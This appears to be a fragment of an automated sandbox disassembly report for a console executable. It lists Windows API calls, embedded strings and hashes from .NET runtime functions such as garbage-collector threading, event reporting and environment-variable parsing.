                                                                                                                                                                                                                          • Opcode ID: 112f74a647afeb1a54e6a59c2e8259108cdfdc77d7c71a18eedbb8e75f305e6f
                                                                                                                                                                                                                          • Instruction ID: 521931aa96926614a4fccefab80f7fd44c637927533efaf7d85fc6d6a991fb8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 112f74a647afeb1a54e6a59c2e8259108cdfdc77d7c71a18eedbb8e75f305e6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D84136327002098FEB20DF69ED84BEEB7B4EF74211F4001AED94596191EB305A55DBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,012DACC7,?,?), ref: 012D9D67
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 012D9D79
                                                                                                                                                                                                                          • GetOverlappedResult.KERNEL32(?,00000000,00000000,00000001), ref: 012D9D90
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000004,00000000,00000000), ref: 012D9DF3
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 012D9E02
                                                                                                                                                                                                                          • GetOverlappedResult.KERNEL32(FFFCB810,?,00000000,00000001), ref: 012D9E1E
                                                                                                                                                                                                                          • WriteFile.KERNEL32(FFFCB810,?,?,00000000,?), ref: 012D9E4A
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 012D9E59
                                                                                                                                                                                                                          • GetOverlappedResult.KERNEL32(FFFCB810,?,00000000,00000001), ref: 012D9E75
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastOverlappedResultWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2326230619-0
                                                                                                                                                                                                                          • Opcode ID: 5bb737a94c085ebf832de37af7c47933ef9e773d06f7518d810b55724faaef78
                                                                                                                                                                                                                          • Instruction ID: ba339322257b77a20ec3e4af0b5e40b2a9bc57518503bb26d5452db311c9da7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb737a94c085ebf832de37af7c47933ef9e773d06f7518d810b55724faaef78
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C513A71A1011AAFDF11CFA8C884EEEBBF9EF48304F058055EA04E7261D771DA95DB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000,?,012D4A5C,00000000), ref: 012D577C
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000008,00000000,?,00000000,?,012D4A5C,00000000), ref: 012D5794
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,012D4A5C,00000000), ref: 012D57D9
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000004,?,012D4A5C,00000000), ref: 012D57F1
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,012D4A5C,00000000), ref: 012D583F
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,012D4A5C,00000000), ref: 012D5853
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,012D4A5C,00000000), ref: 012D5874
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,012D4A5C,00000000), ref: 012D58F6
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                            • Part of subcall function 0122D020: CreateFileW.KERNEL32(00000000,40000000,00000080,00000000,?,?,00000000,?,00000000,00000000,00000000,7CAB6A82,00000000,00000000,00000000), ref: 0122D19C
                                                                                                                                                                                                                            • Part of subcall function 0122D020: GetLastError.KERNEL32(?,00000000,00000000,00000000,7CAB6A82,00000000,00000000,00000000), ref: 0122D1AA
                                                                                                                                                                                                                            • Part of subcall function 0122D020: SetLastError.KERNEL32(00000000), ref: 0122D2E0
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,?,00000002,00000080,?,?,?,012D4A5C,00000000), ref: 012D58CB
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000001,?,00000002,00000080,?,?,?,012D4A5C,00000000), ref: 012D5949
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$ErrorLastProcess$AllocByteCharMultiWidefree$AllocateCreateFilemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4222695509-0
                                                                                                                                                                                                                          • Opcode ID: b1e14d6a7b5c481e79f879d4d7cc87e788583fddbc00431596651db005d89860
                                                                                                                                                                                                                          • Instruction ID: 5eb3601a2a2241d74d6c9cf7a1ac97bdc41ccc94ce176731caa7886a12395fff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1e14d6a7b5c481e79f879d4d7cc87e788583fddbc00431596651db005d89860
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8651D371710312EFEB219FA9DC45B6A7BA4EF44721F114179EA49DB3A0EBB09850CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WaitForMultipleObjectsEx.KERNEL32(00000003,?,00000000,?,00000000), ref: 0124FBCD
                                                                                                                                                                                                                          • SetEvent.KERNEL32(00000200,?,00000000,?,00000000), ref: 0124FC06
                                                                                                                                                                                                                            • Part of subcall function 01236A30: SleepEx.KERNEL32(000000FF,00000000,?,00000000,?,?,01242973,?,?,?,03C176F0), ref: 01236A4C
                                                                                                                                                                                                                            • Part of subcall function 01236A30: SleepEx.KERNEL32(000000FF,00000000,?,00000000,?,?,01242973,?,?,?,03C176F0), ref: 01236A6C
                                                                                                                                                                                                                            • Part of subcall function 01236720: LeaveCriticalSection.KERNEL32(03C17714,?,03C176F0,0124FE08), ref: 01236731
                                                                                                                                                                                                                            • Part of subcall function 01236720: SleepEx.KERNEL32(000000FF,00000000,0124FE08), ref: 01236779
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DRCT::ML:: wait set empty after sweep., xrefs: 0124FD5F
                                                                                                                                                                                                                          • DRCT::THTML:: Doing helper thread duty, running main loop., xrefs: 0124FEB0
                                                                                                                                                                                                                          • DRCT::ML:: threads still syncing after sweep., xrefs: 0124FD88
                                                                                                                                                                                                                          • DRCT::ML:: Exiting., xrefs: 0124FDE7
                                                                                                                                                                                                                          • DRCT::THTML:: Exiting., xrefs: 0124FFCA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep$CriticalEventLeaveMultipleObjectsSectionWait
                                                                                                                                                                                                                          • String ID: DRCT::ML:: Exiting.$DRCT::ML:: threads still syncing after sweep.$DRCT::ML:: wait set empty after sweep.$DRCT::THTML:: Doing helper thread duty, running main loop.$DRCT::THTML:: Exiting.
                                                                                                                                                                                                                          • API String ID: 568098540-3202962050
                                                                                                                                                                                                                          • Opcode ID: 7a00f5753f2d1614c0a73009f965dda9eb73ec0c050030364aaac6e4f0913709
                                                                                                                                                                                                                          • Instruction ID: 8f631a26aa54dc31fdae910a4542f50a1e727202425b14fa8dfed478f01c068b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a00f5753f2d1614c0a73009f965dda9eb73ec0c050030364aaac6e4f0913709
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EA1B170E10245DBEF29DFACCA88BAEBBB5EF44310F144159DA51AB3C1D7759940CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00650072,03C176F0,?,7CAB6A82), ref: 0115DBCE
                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000001,00000000), ref: 0115DDC5
                                                                                                                                                                                                                          • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,014DD6C5,000000FF,?,0115F6C7,03C16300), ref: 0115DDCB
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,7CAB6A82), ref: 0115DE03
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RareEnablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DFD6
                                                                                                                                                                                                                          • RareDisablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DC68
                                                                                                                                                                                                                          • RareEnablePreemptiveGC: leaving., xrefs: 0115E05A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$SleepSwitchThread
                                                                                                                                                                                                                          • String ID: RareDisablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: leaving.
                                                                                                                                                                                                                          • API String ID: 490134931-775955930
                                                                                                                                                                                                                          • Opcode ID: 5b30efe5a679155bde85b30f694457398125b9c3c6e60fb19be41f9c71bee38f
                                                                                                                                                                                                                          • Instruction ID: 8b24cb2f7add136ead9570ce46da407cf90f336f1281011b465b7715217ac96c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b30efe5a679155bde85b30f694457398125b9c3c6e60fb19be41f9c71bee38f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C81E330700201DBEFA9DF6CEC94B6A7BA5AF41704F08809CED655B2D6CB75A851CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002, at,00000005,00000004,00000000,00000000,?), ref: 010D40E1
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                            • Part of subcall function 010D3E00: HeapFree.KERNEL32(00000000,?), ref: 010D3F34
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 010D4185
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,0159BF18,?, ,00000000,?), ref: 010D4202
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,010D3D80,?,00000109,00000000,?,0159BF18,?, ,00000000,?), ref: 010D4291
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,010D3D80,?,00000109,00000000,?,0159BF18), ref: 010D42C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$wcscpy_s
                                                                                                                                                                                                                          • String ID: $ at
                                                                                                                                                                                                                          • API String ID: 1983039323-3158221822
                                                                                                                                                                                                                          • Opcode ID: 1986004a59ac1a7457556bbf4f2a559515352afa8628c49203e7791009d4372a
                                                                                                                                                                                                                          • Instruction ID: ca95649babc3c28589306737e7d38fccf8d14934c5a90374ad5f8bd608711df9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1986004a59ac1a7457556bbf4f2a559515352afa8628c49203e7791009d4372a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A89198B4E00308EBEB25CFA9DD85BEDBBB5BF54314F144219E850BB6A0DB746905CB81
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,?), ref: 012CD3C9
                                                                                                                                                                                                                            • Part of subcall function 012CDF00: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,Microsoft-DotNETCore-SampleProfiler,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CDF22
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,timeBeginPeriod), ref: 012CD4B9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(timeEndPeriod), ref: 012CD4CF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$FreeHeapstrcmp
                                                                                                                                                                                                                          • String ID: Microsoft-DotNETCore-SampleProfiler$timeBeginPeriod$timeEndPeriod$winmm.dll
                                                                                                                                                                                                                          • API String ID: 974609388-753872048
                                                                                                                                                                                                                          • Opcode ID: bbbaf6b67b13d83cdd703679ff3b3ad04854f4ed959a79a21a5d6341d4662749
                                                                                                                                                                                                                          • Instruction ID: a25a27e0f617ca4e22571df16f45a6b3ada23e573254b1714dc30106fe72a14d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbbaf6b67b13d83cdd703679ff3b3ad04854f4ed959a79a21a5d6341d4662749
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2271D734610306AFDB24DF68EC81B6A77E2FF94B51F14422DEB069B694DB71D810CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002,03C1ABF8,03C1ABF6,00000004,00000000,7CAB6A82,00000000,00000000), ref: 010256C0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,7CAB6A82,00000000,00000000), ref: 0102578B
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,7CAB6A82,00000000,00000000), ref: 01025795
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GC_VersionInfo), ref: 010257D4
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82,00000002), ref: 00FCF12B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GC_Initialize), ref: 01025826
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeHeapProc$ErrorLastwcscpy_s
                                                                                                                                                                                                                          • String ID: GC_Initialize$GC_VersionInfo
                                                                                                                                                                                                                          • API String ID: 2550415743-311598099
                                                                                                                                                                                                                          • Opcode ID: d9df7d05f6e1c85a5d66c1d8ee806f63b7a6e77631a62104db958022a88645fd
                                                                                                                                                                                                                          • Instruction ID: ba0339785992151db3938fd50409c8dbb36f3083fea27011fc32b7a060431dbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9df7d05f6e1c85a5d66c1d8ee806f63b7a6e77631a62104db958022a88645fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A771CBB19002289BDB21DF18DC49BEEBBB4FF48310F1441D9E889AB290EB745E54CF95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AmsiInitialize), ref: 0117FB69
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AmsiScanBuffer), ref: 0117FB9B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,7CAB6A82,0000002C,00000000,00000024), ref: 0117FBC8
                                                                                                                                                                                                                            • Part of subcall function 00FDF1E0: DeleteCriticalSection.KERNEL32(00000000,?,7CAB6A82,016456A4,80004005), ref: 00FDF228
                                                                                                                                                                                                                            • Part of subcall function 00FDF1E0: HeapFree.KERNEL32(00000000,00000000,7CAB6A82,016456A4,80004005,?,?,?,?,?,?,?,?,00000000,014E8AB5,000000FF), ref: 00FDF24D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCriticalProcSection$DeleteFreeHeapLeave
                                                                                                                                                                                                                          • String ID: AmsiInitialize$AmsiScanBuffer$amsi.dll$coreclr
                                                                                                                                                                                                                          • API String ID: 2465865910-2862599151
                                                                                                                                                                                                                          • Opcode ID: 8ad326af1f3684a44f09bbd9a31c68f764887820fc1dc39f43a6da03466f75aa
                                                                                                                                                                                                                          • Instruction ID: b1550d10a7e509a630802aa8c15bd0490cb35cd880091c800a6807b95e3cdd58
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ad326af1f3684a44f09bbd9a31c68f764887820fc1dc39f43a6da03466f75aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A51D075A403469FEB358F69DC84BAFBBB4FB04B11F000169EC21A3380DB75AC028B90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • towlower.API-MS-WIN-CRT-STRING-L1-1-0(00000043,00000000,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B05E
                                                                                                                                                                                                                          • towlower.API-MS-WIN-CRT-STRING-L1-1-0(00000044,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B06A
                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B07A
                                                                                                                                                                                                                          • towlower.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B0A1
                                                                                                                                                                                                                            • Part of subcall function 01223640: LCMapStringEx.KERNEL32(0159B9F0,00000200,00000003,00000001,?,00000001,00000000,00000000,00000000), ref: 01223729
                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,?,01418224,7CAB6A82,7CAB6A82,?,?,00000000), ref: 0121B1A0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: towlower$EnvironmentFreeStrings_errno$HeapStringwcstoul
                                                                                                                                                                                                                          • String ID: COMPlus_$DOTNET_
                                                                                                                                                                                                                          • API String ID: 2914145733-1316173318
                                                                                                                                                                                                                          • Opcode ID: d64ef249b7590fb3a00a9a301d0a22ef3c6de150b7e4d40a0961726cf6d340d5
                                                                                                                                                                                                                          • Instruction ID: 20ea8a5066ab091dc7cb3797db00fa3372b30437092d4f516ef47a0e4128b0e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d64ef249b7590fb3a00a9a301d0a22ef3c6de150b7e4d40a0961726cf6d340d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1541E635E2021BABEB21EB5C88117FF77FAEF64350F850055EA45DB288EB719941C790
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(7CAB6A82,?,00000000), ref: 010E27F2
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 010E2829
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 010E2869
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 010E28EA
                                                                                                                                                                                                                            • Part of subcall function 00FCD660: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD68B
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 010E28A4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ResumeThread, xrefs: 010E281D
                                                                                                                                                                                                                          • %s failed with error %u. Handle: 0x%p, xrefs: 010E281E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFreeHeapMultiWide$ErrorLast_swprintf
                                                                                                                                                                                                                          • String ID: %s failed with error %u. Handle: 0x%p$ResumeThread
                                                                                                                                                                                                                          • API String ID: 378439020-1438827283
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegisterEventSourceW.ADVAPI32(00000000,.NET Runtime), ref: 011851FA
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,010D4A6F), ref: 01185206
                                                                                                                                                                                                                          • ReportEventW.ADVAPI32(00000000,00000001,00000000,000003FF,00000000,00000001,00000000,016371B8,00000000), ref: 01185222
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,010D4A6F), ref: 0118522A
                                                                                                                                                                                                                          • DeregisterEventSource.ADVAPI32(00000000), ref: 01185233
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • .NET Runtime, xrefs: 011851F3
                                                                                                                                                                                                                          • EventReporter::Report: Event log is full, corrupt or not enough memory to process., xrefs: 0118526D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Event$ErrorLastSource$DeregisterRegisterReport
                                                                                                                                                                                                                          • String ID: .NET Runtime$EventReporter::Report: Event log is full, corrupt or not enough memory to process.
                                                                                                                                                                                                                          • API String ID: 2240410200-2109140546
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,?,012CD80A,80020139,00000000,00000000,?,?,?,?,?,?,012CDA55,?), ref: 012D5273
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000018,?,00000000,?,?,012CD80A,80020139,00000000,00000000), ref: 012D5290
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,?,012CD80A,80020139,00000000,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82), ref: 012D52CB
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(012CD80A,?,012CD80A,80020139,00000000,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82), ref: 012D52E2
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012D52FA
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012D530A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimeRundown, xrefs: 012D52CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap_strdupfree$AllocProcess
                                                                                                                                                                                                                          • String ID: Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 3838182309-930870680
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,Error 0x%08x.BreakOnBadExit: returning bad exit code.,80131506,80131506,?), ref: 010D3C80
                                                                                                                                                                                                                          • DebugBreak.KERNEL32 ref: 010D3C92
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(80131506,80131506,?), ref: 010D3CB3
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 010D3CBA
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 010D3CCB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error 0x%08x.BreakOnBadExit: returning bad exit code., xrefs: 010D3C79
                                                                                                                                                                                                                          • SafeExitProcess: exitCode = %d sca = %d, xrefs: 010D3BFF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$BreakCurrentDebugExitTerminate__acrt_iob_func
                                                                                                                                                                                                                          • String ID: Error 0x%08x.BreakOnBadExit: returning bad exit code.$SafeExitProcess: exitCode = %d sca = %d
                                                                                                                                                                                                                          • API String ID: 4023824191-4137208948
                                                                                                                                                                                                                          • Opcode ID: ba0b159ca5b94742f3e73e7328e4c83486c6baf8c12c3336fdee404048397904
                                                                                                                                                                                                                          • Instruction ID: 0284cfe4122e44c8f6cf294e1d716618a84680c842414436869811ced79113c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba0b159ca5b94742f3e73e7328e4c83486c6baf8c12c3336fdee404048397904
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 232167B46003156FEB70A72ED80CFAA7BD8AF41301F05409DEA489B291EB759811C7A3
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0122A820: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0122A8C3
                                                                                                                                                                                                                            • Part of subcall function 0122A820: HeapFree.KERNEL32(00000000,00000000,7CAB6A82), ref: 0122A8F7
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0122A99C
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0122A9A3
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,010851AE,(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0,7CAB6A82,00000000), ref: 0122A9AA
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,010851AE,(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0,7CAB6A82,00000000), ref: 0122A9B1
